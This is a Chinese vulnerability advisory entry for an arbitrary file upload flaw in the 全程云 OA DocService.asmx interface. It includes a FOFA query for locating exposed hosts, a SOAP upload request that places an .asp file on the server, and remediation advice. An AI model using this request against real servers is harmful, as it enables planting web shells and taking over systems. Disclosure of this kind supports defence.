跳转至

全程云DocumentDocService.asmx接口存在任意文件上传漏洞

漏洞描述

全程云DocumentDocService.asmx接口存在任意文件上传漏洞,攻击者可上次恶意木马文件导致控制服务器,危害极大。

影响版本

全程云

漏洞状态

漏洞细节 漏洞POC 漏洞EXP 在野利用
已公开 已公开 已知

风险等级

维度 评价
威胁等级 高危
影响面 广
攻击者价值
利用难度

漏洞复现

FOFA:body="UserLoginFaster"

POC/EXP:

POST /OA/Document/DocService.asmx HTTP/1.1 Host: 127.0.0.1 Content-Type: text/xml; charset=utf-8 Content-Length: 395 SOAPAction: "http://tempuri.org/SaveFile"

Y2VzaGk= jp.asp

image-20241028200856632

http://127.0.0.1/oa/Upfiles/temp/jp.asp

image-20241028200949710

修复方案

关闭互联网暴露面或接口设置访问权限

升级至安全版本